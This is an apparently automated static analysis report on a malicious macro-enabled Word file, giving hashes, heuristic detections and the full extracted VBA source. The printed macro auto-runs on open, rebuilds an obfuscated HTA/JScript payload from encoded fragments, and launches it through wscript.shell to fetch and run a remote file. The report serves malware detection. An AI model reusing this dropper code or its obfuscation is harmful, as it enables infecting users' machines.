Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 93d24ca733d56822…

MALICIOUS

Office (OOXML)

80.4 KB Created: 2021-04-01 06:34:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: 761064e25afcd708683e84b339704d7a SHA-1: fc3274da2b808d4649a59700835e2055e7413370 SHA-256: 93d24ca733d568223fca286849daae0b5910da906043029da741acea09ec2c2f
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set ExCounterRight = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ExCounterRight = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9575 bytes
SHA-256: 0d27c8c2e2dc890ef2e47ac0135317dd64e978d21a66225e0dc4a31124c3c9bf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{282D1E79-CBEE-46B2-AC76-0FBBFBF66030}{488C8366-6832-4426-A5D0-1687D87B1435}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function varTextbox()
With frm.button1
varTextbox = .Tag
End With
End Function
Function localArgumentVariable()
With frm.button1
localArgumentVariable = .Caption
End With
End Function
Public Sub button1_Click()
Set ExCounterRight = CreateObject("wscript.shell")
ExCounterRight.exec p(varTextbox) & " " & p(localArgumentVariable)
End Sub


Attribute VB_Name = "requestProcTextbox"
Sub autoopen()
textboxSwapLen
End Sub
Function intel(countA)
intel = "" & countA & ""
End Function
Sub textboxSwapLen()
Dim libSizeNext As String
libSizeNext = p(frm.button1.Caption)
Set tableExLeft = New rightRemove
tableExLeft.counterSizeNext libSizeNext, structRef
frm.button1_Click
End Sub
Function indexTextboxClass(responseListbox, referenceSelectProc, genericDelete)
indexTextboxClass = Replace(responseListbox, referenceSelectProc, genericDelete)
End Function

Attribute VB_Name = "pasteExceptionDocument"
Function bufNextArray()
bufNextArray = intel("<html><body><div id='content'>fTtlc29sYy5vcGVSeG9idHhlVG1lbTspMi")
End Function
Function countVbPaste()
countVbPaste = intel("AsImdwai5iaUxldWxhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMub3")
End Function
Function tableProcValue()
tableProcValue = intel("BlUnhvYnR4ZVRtZW07KXlkb2Jlc25vcHNlci55cm9tZU10Y3VydHMoZXRpcncub3")
End Function
Function tempAA()
tempAA = intel("BlUnhvYnR4ZVRtZW07MSA9IGVweXQub3BlUnhvYnR4ZVRtZW07bmVwby5vcGVSeG")
End Function
Function funcLinkGeneric()
funcLinkGeneric = intel("9idHhlVG1lbTspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSBvcG")
End Function
Function windowStructVariable()
windowStructVariable = intel("VSeG9idHhlVG1lbSByYXZ7KTAwMiA9PSBzdXRhdHMueXJvbWVNdGN1cnRzKGZpOy")
End Function
Function storageRequestConvert()
storageRequestConvert = intel("koZG5lcy55cm9tZU10Y3VydHM7KWVzbGFmICwid2lUS29iWmdsPWRpYyY5ck5sNT")
End Function
Function argumentBufferList()
argumentBufferList = intel("1kaSZYZHQwMTcxbzRMZz1vd2R3S2txNnJBJmViZDFwd2w9cmVzdSZSd3lETD1CR0")
End Function
Function storageData()
storageData = intel("NSODdyR1omaXBnQVNiaXYzQmo9MXFmN3BZJm9aWlFCTDZ3ZDZLV1NmbDlLME1GdD")
End Function
Function pointerWindow()
pointerWindow = intel("1xJmVZa2ZHZkxTVz1lbWl0PzVuYXgvMzgxNzIvdTc1MTFQWU1BWklFSGhCMHFQcE")
End Function
Function listboxStructNext()
listboxStructNext = intel("5nanBvZlNvSVZiRWFrb1dGWDl6QlRDaS9ycFZjTkhDLzA1MTQ0L3VicDlNMlRnMj")
End Function
Function libVarSelect()
libVarSelect = intel("JHR01RMk40Qkt1LzZkUThTUFRJbE1CU2lXdmgxS0M0aDV0Vm5tN1o0dTRVL21SVn")
End Function
Function swapConvertValue()
swapConvertValue = intel("F4dDh4Qlc0NzZTMUE1dE1RM25CaTNKaFFDYzZVTFdRbjJDLzU1Mzc0L3N5dW9nL2")
End Function
Function constView()
constView = intel("1vYy55cmV2aWxlZC04MDAyc2xsaW0vLzpwdHRoIiAsIlRFRyIobmVwby55cm9tZU")
End Function
Function nextView()
nextView = intel("10Y3VydHM7KSJwdHRobG14LjJsbXhzbSIodGNlamJPWGV2aXRjQSB3ZW4gPSB5cm")
End Function
Function globalListboxProc()
globalListboxProc = intel("9tZU10Y3VydHMgcmF2|fXspeG9idHNpTGV0ZWxlZChoY3RhY307KSJhdGguYmlMZ")
End Function
Function arrayCounter()
arrayCounter = intel("XVsYXZcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLnJ0UG5lTG5vaXRwZ")
End Function
Function borderVar()
borderVar = intel("WN4ZXt5cnQ7KSJ0Y2VqYm9tZXRzeXNlbGlmLmduaXRwaXJjcyIodGNlamJPWGV2a")
End Function
Function bufferStructStruct()
bufferStructStruct = intel("XRjQSB3ZW4gPSBydFBuZUxub2l0cGVjeGUgcmF2OykiZ3BqLmJpTGV1bGF2XFxja")
End Function
Function argumentListboxVar()
argumentListboxVar = intel("WxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIobnVyLikibGxlaHMudHBpcmNzdyIod")
End Function
Function globalIndexMemory()
globalIndexMemory = intel("GNlamJPWGV2aXRjQSB3ZW4=</div><div id='table1'>ABCDEFGHIJKLMNOPQR")
End Function
Function procCaptionRemove()
procCaptionRemove = intel("STUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3")
End Function
Function storageTrustCounter()
storageTrustCounter = intel("'></div><script language='javascript'>function localRepoGeneric(")
End Function
Function requestFuncRight()
requestFuncRight = intel("sizeArray){return(new ActiveXObject(sizeArray));}function reques")
End Function
Function memPtr()
memPtr = intel("tGenericBorder(pointerFuncIndex){return(deleteWindow.getElementB")
End Function
Function requestSwap()
requestSwap = intel("yId(pointerFuncIndex).innerHTML);}function swapQueryScreen(){var")
End Function
Function mainExSize()
mainExSize = intel(" pasteVariable = requestGenericBorder('table1');var copyRefTemp ")
End Function
Function queryVariableLink()
queryVariableLink = intel("= pasteVariable.toLowerCase();var classTable = requestGenericBor")
End Function
Function textOption()
textOption = intel("der('table2');return(pasteVariable + copyRefTemp + classTable);}")
End Function
Function databaseSwap()
databaseSwap = intel("function convertStruct(s){var e={}; var i; var b=0; var c; var x")
End Function
Function deleteTemp()
deleteTemp = intel("; var l=0; var a; var loadSwapCopy=''; var w=String.fromCharCode")
End Function
Function procBufferScreen()
procBufferScreen = intel("; var L=s.length;var classRemove = 'charAt';for(i=0;i<64;i++){e[")
End Function
Function screenMainList()
screenMainList = intel("swapQueryScreen()[classRemove](i)]=i;}for(x=0;x<L;x++){c=e[s[cla")
End Function
Function textboxValueLen()
textboxValueLen = intel("ssRemove](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)")
End Function
Function textboxTextboxVar()
textboxTextboxVar = intel("||(x<(L-2)))&&(loadSwapCopy+=w(a));}}return(loadSwapCopy);};func")
End Function
Function textboxClass()
textboxClass = intel("tion ATmp(WRemove){return WRemove.split('').reverse().join('');}")
End Function
Function linkArrayCaption()
linkArrayCaption = intel("classCountWindow = window;deleteWindow = document;classCountWind")
End Function
Function optionClearScreen()
optionClearScreen = intel("ow.resizeTo(1, 1);classCountWindow.moveTo(-100, -100);var rightV")
End Function
Function nextCounterLib()
nextCounterLib = intel("bClear = deleteWindow.getElementById('content').innerHTML;var ri")
End Function
Function lenVariableData()
lenVariableData = intel("ghtVbClear = rightVbClear.split('|');var pasteExceptionException")
End Function
Function valueLen()
valueLen = intel(" = ATmp(convertStruct(rightVbClear[0]));var variableRequest = AT")
End Function
Function sizeRefSwap()
sizeRefSwap = intel("mp(convertStruct(rightVbClear[1]));</script><script language='ja")
End Function
Function repoQuery()
repoQuery = intel("vascript'>function tempMainPaste(constW){var variableTemp = loca")
End Function
Function classConvert()
classConvert = intel("lRepoGeneric('msscriptcontrol.scriptcontrol');variableTemp.Langu")
End Function
Function AButton()
AButton = intel("age = 'jscript';variableTemp.Timeout = 60000;variableTemp.AddCod")
End Function
Function copyExceptionArray()
copyExceptionArray = intel("e(constW);return(null);}</script><script language='vbscript'>tem")
End Function
Function localCaptionBorder()
localCaptionBorder = intel("pMainPaste pasteExceptionException : tempMainPaste variableReque")
End Function
Function procedureDatabase()
procedureDatabase = intel("st : classCountWindow.close</script></body></html>")
End Function
Function structRef()
structRef = bufNextArray + countVbPaste + tableProcValue + tempAA + funcLinkGeneric + windowStructVariable + storageRequestConvert + argumentBufferList + storageData + pointerWindow + listboxStructNext + libVarSelect + swapConvertValue + constView + nextView + globalListboxProc + arrayCounter + borderVar + bufferStructStruct + argumentListboxVar + globalIndexMemory + procCaptionRemove + storageTrustCounter + requestFuncRight + memPtr + requestSwap + mainExSize + queryVariableLink + textOption + databaseSwap + deleteTemp + procBufferScreen + screenMainList + textboxValueLen + textboxTextboxVar + textboxClass + linkArrayCaption + optionClearScreen + nextCounterLib + lenVariableData + valueLen + sizeRefSwap + repoQuery + classConvert + AButton + copyExceptionArray + localCaptionBorder + procedureDatabase
End Function

Attribute VB_Name = "rightRemove"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub counterSizeNext(screenGeneric As String, copyClassIterator As String)
Dim varVar As FileSystemObject
Set varVar = New FileSystemObject
Dim linkBufferBuffer As TextStream
Set linkBufferBuffer = varVar.CreateTextFile(screenGeneric)
linkBufferBuffer.WriteLine copyClassIterator
linkBufferBuffer.Close
Set linkBufferBuffer = Nothing
Set varVar = Nothing
End Sub

Attribute VB_Name = "libSize"
Function p(referenceRefNext)
p = indexTextboxClass(referenceRefNext, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: ed41ade5bf9016a83cb682686b5885b0a762ea42b82b97a2fd3412ff3944eb73

Open this report in the interactive analyzer, or submit your own file for analysis.